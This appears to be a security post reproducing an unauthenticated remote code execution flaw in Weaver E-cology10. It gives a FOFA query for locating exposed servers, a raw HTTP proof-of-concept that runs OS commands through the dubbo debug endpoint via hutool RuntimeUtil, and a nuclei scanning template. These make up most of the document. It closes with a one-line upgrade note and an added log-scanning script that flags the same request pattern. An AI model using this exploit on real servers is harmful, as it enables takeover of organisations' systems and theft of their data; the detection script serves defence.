Reproducing the Remote Code Execution Vulnerability in Weaver E-cology10

Vulnerability overview:

Weaver E-cology10 is a digitalised collaborative operations platform aimed at medium and large organisations. Positioned as an enterprise-level digital hub, its core capabilities cover collaborative office work, process management, business integration, knowledge management and low-code development. E-cology10 contains a remote code execution vulnerability: an unauthenticated attacker can send a crafted request to a specific interface and execute arbitrary code on the target server, taking full control of it and leading to leakage of sensitive data or compromise of the system.

FOFA query

icon_hash="-1619753057"

Reproduction

PoC:

POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
timeZoneOffset: -480
langType: zh_CN
Content-Length: 12
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

[["whoami"]]

Nuclei template:

id: fanwei-E-cology10-QVD-2026-14149

info:
  name: 泛微E-cology10 存在远程代码执行漏洞(QVD-2026-14149)
  author: AYAQ
  severity: critical
  description: |
    泛微E-cology10 存在远程代码执行漏洞(QVD-2026-14149)
    fofa:icon_hash="-1619753057"
  tags: E-cology10,fanwei

http:
  - raw:
      - |
        POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Connection: keep-alive
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/601.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/601.1.15

        [["ipconfig"]]

      - |
        POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Connection: keep-alive
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/601.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/601.1.15

        [["id"]]

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"Windows IP")'
          - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)"
      - type: status
        status:
          - 200

Burp Suite: (screenshot of the request and response from the original post; image not preserved)

Remediation

Upgrade to the latest security-patched version.
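While the upgrade is being rolled out, the request shape shown in the PoC above (a POST to the dubbo debug endpoint naming cn.hutool.core.util.RuntimeUtil) is easy to spot in web-server access logs. The script below is an added example written for this page, not code from the original post or from Weaver; it assumes combined/common-format access logs, and the sample log lines and IP addresses in it are constructed.

```python
# Flag access-log entries matching the E-cology10 dubbo debug-endpoint RCE pattern.
# Added example for this page; not code from the original post or the vendor.
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and class name taken from the PoC / nuclei template on this page.
DEBUG_PATH = "/papi/esearch/data/devops/dubboApi/debug/method"
RUNTIME_CLASS = "cn.hutool.core.util.RuntimeUtil"

# Common/combined access-log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def classify(line):
    """Return (severity, reason) for one log line, or None if not of interest."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if unquote(url.path) != DEBUG_PATH:  # unquote defeats %2F-style path encoding
        return None
    qs = parse_qs(url.query)  # parse_qs already percent-decodes the values
    iface = qs.get("interfaceName", [""])[0]
    meth = qs.get("methodName", [""])[0]
    if iface == RUNTIME_CLASS:
        # Exactly the PoC: OS command execution through hutool RuntimeUtil.
        # A 200 here means the server accepted the call, i.e. it is likely unpatched.
        return ("critical", f"RuntimeUtil.{meth or '?'} via dubbo debug endpoint, HTTP {m.group('status')}")
    # Any hit on the unauthenticated debug endpoint deserves a look.
    return ("high", f"dubbo debug endpoint call: {iface or '?'}.{meth or '?'}")


def scan(lines):
    """Return [(client_ip, severity, reason)] for every suspicious line."""
    hits = []
    for line in lines:
        result = classify(line)
        if result:
            hits.append((LOG_RE.match(line).group("ip"),) + result)
    return hits


SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '203.0.113.5 - - [12/Mar/2026:10:01:02 +0800] "POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2026:10:01:05 +0800] "GET /login HTTP/1.1" 200 1832 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Mar/2026:10:01:09 +0800] "POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=com.example.OrderService&methodName=list HTTP/1.1" 200 312 "-" "curl/8.4.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, sev, why in scan(SAMPLE_LOG):
        print(f"[{sev}] {ip}: {why}")
```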